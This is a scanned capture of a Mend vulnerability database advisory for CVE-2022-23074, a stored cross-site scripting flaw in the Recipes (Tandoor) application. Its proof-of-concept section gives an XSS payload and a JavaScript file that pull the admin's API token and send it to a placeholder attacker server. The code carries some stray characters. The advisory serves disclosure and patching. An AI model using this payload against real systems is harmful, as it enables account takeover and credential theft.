urlscan.io logo urlscan.io
SecurityTrails logo

www.mend.io Open in urlscan Pro
2600:9000:225a:7c00:1c:c724:8440:93a1  Public Scan

Back to summary
URL: https://www.mend.io/vulnerability-database/CVE-2022-23074
Submission: On June 29 via api from NL — Scanned from NL

Form analysis 0 forms found in the DOM

Text Content

 * Product
   * Mend SCA
   * Mend SAST
   * Mend Renovate
   * Supply Chain Defender
   * Integrations for Developers' Environments
 * Solutions
   * Mend Platform
   * Open Source Security
   * Open Source License Compliance
   * Software Bill of Materials (SBOM)
   * Open Source Audit
 * Pricing
 * Company
   * About Us
   * Diversity & Inclusion
   * Careers
   * Press Releases
   * Events
   * Partners
   * Customers
   * Contact Us
 * Resources
   * Resource Center
   * Blog
   * Product Info
   * Success Stories
   * Vulnerability Database
   * Languages
   * Integrations
   * Documentation

   Request a Demo
 * Log In

 * Vulnerabilities
 * Projects
   
 * About Us
 * Contact Us

 * 
 * 
 * 

   
 * Vulnerabilities
 * Projects
   
 * About Us
 * Contact Us

--------------------------------------------------------------------------------

   
 * 
 * 
 * 

Home > Vulnerability Database > CVE-2022-23074


MEND VULNERABILITY DATABASE

What is a CVE vulnerability ID? What is a WS vulnerability ID?
New vulnerability? Tell us about it!


WE FOUND RESULTS FOR “”

 * Previous
 * 1
 * 2
 * 3
 * ...
 * Next


CVE-2022-23074

DATE: JUNE 21, 2022

OVERVIEW

In Recipes, versions 0.17.0 through 1.2.5 are vulnerable to Stored Cross-Site
Scripting (XSS), in the ‘Name’ field of Keyword, Food and Unit components. When
a victim accesses the Keyword/Food/Unit endpoints, the XSS payload will trigger.
A low privileged attacker will have the victim's API key and can lead to admin's
account takeover.

DETAILS

In Recipes, versions 0.17.0 through 1.2.5 are vulnerable to Stored Cross-Site
Scripting (XSS), in the ‘Name’ field of Keyword, Food and Unit components. When
a victim accesses the Keyword/Food/Unit endpoints, the XSS payload will trigger.
A low privileged attacker will have the victim's API key and can lead to admin's
account takeover.

POC DETAILS

Access the application through a web browser and login as a user. Now navigate
to the food list from the navigation bar. On the food list page, click on the
plus '+' icon. Under the name input field, enter the XSS payload given in the
"POC Code" section below and save it. Then host the JavaScript file for fetching
the victim's API (the code for the JavaScript file can be found in the "POC
Code" section below). In a new browser window, login as administrator and access
the food list page (for example). This will trigger the XSS payload and the
attacker will receive the admin's API key in the listener.

POC CODE

XSS payload: 
<img src=a onerror="var x=document.createElement('script');x.src='<attacker_server>/api.js';document.body.appendChild(x);">

JavaScript file (api.js):
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/settings/',true);
req.send();
function handleResponse() {
t var a=this.responseText.match(/Authorization: Token.{1,}/)[0];
t a=a.split("Token ")[1];
t a=a.split("<")[0];
t console.log(a);
t var changeReq = new XMLHttpRequest();
     changeReq.open('get', '<attacker_server>:<attacker_port>/api='+a, false);
     changeReq.send()

AFFECTED ENVIRONMENTS

0.17.0 through 1.2.5

PREVENTION

Update version to 1.2.6 or higher

LANGUAGE: PYTHON

GOOD TO KNOW:


 * Severity Score
 * Weakness Type (CWE)
 * Top Fix

5.4


Cross-Site Scripting (XSS)

CWE-79

UPGRADE VERSION

Upgrade to version 1.2.6

Learn More

 * CVSS v3.1
 * CVSS v2

Base Score:
5.4

Attack Vector (AV): Network Attack Complexity (AC): Low Privileges Required
(PR): Low User Interaction (UI): Required Scope (S): Changed Confidentiality
(C): Low Integrity (I): Low Availability (A): None

Base Score:
3.5

Access Vector (AV): Network Access Complexity (AC): Medium Authentication (AU):
Single Confidentiality (C): None Integrity (I): Partial Availability (A): None
Additional information:


RELATED RESOURCES (3)

Url: https://nvd.nist.gov/vuln/detail/CVE-2022-23074
Url:
https://github.com/TandoorRecipes/recipes/commit/7b2117c0190d4f541ba4cc7ee4122f04738c4ac6
Url: https://www.mend.io/vulnerability-database/CVE-2022-23074
This website uses 'cookies' to give you the most relevant experience. By
browsing this site you are agreeing to our use of cookies. Find out more about
our privacy policy.Okay, thanks